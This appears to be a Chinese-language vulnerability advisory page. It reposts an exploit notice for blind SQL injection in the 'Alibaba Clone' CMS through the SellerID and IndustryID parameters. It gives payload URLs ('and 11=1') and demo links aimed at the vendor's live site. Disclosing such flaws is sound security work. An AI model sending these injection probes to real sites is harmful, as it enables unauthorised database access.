Alibaba Clone "SellerID" and "IndustryID" SQL注入漏洞

发表评论 (0) 查看评论

影响软件:WebDevelopmentHouse.com Alibaba Clone

 

描述:

category.php“ IndustryID ”和category.php“ SellerID ” supplier/view_contact_details.php 没有严格的过滤.存在SQL注入

 

XML/HTML代码
  1. # [+] Alibaba-clone CMS Remote Blind SQL injection   
  2. # [+] Author : 599eme Man   
  3. # [+] Contact : Flouf@live.fr   
  4. # [+] Thanks : Moudi, Neocoderz, Sheiry, Shimik Root aka Str0zen, Pr0H4ck3rz, Staker…   
  5. # [+] Dowload : http://blog.duslerim.net/cms/alibabacom-clone-new.html   
  6. #   
  7. #[————————————————————————————]   
  8. #   
  9. #   
  10. # [+] Exploit :   
  11. #   
  12. # http://www.site.com/path/supplier/view_contact_details.php?SellerID=[nr] and 11=1   
  13. #   
  14. # http://www.site.com/path/category.php?IndustryID=[nr] and 11=1   
  15. #   
  16. #[————————————————————————————]   
  17. #   
  18. #   
  19. # [+] Demo :   
  20. #   
  21. # http://www.webdevelopmenthouse.com/alibaba-clone/supplier/view_contact_details.php?SellerID=24 and 11=1   
  22. #   
  23. # http://www.webdevelopmenthouse.com/alibaba-clone/category.php?IndustryID=25 and 11=1   
  24. #   
  25. #########################################################################################################   
发表评论?

0 条评论。

发表评论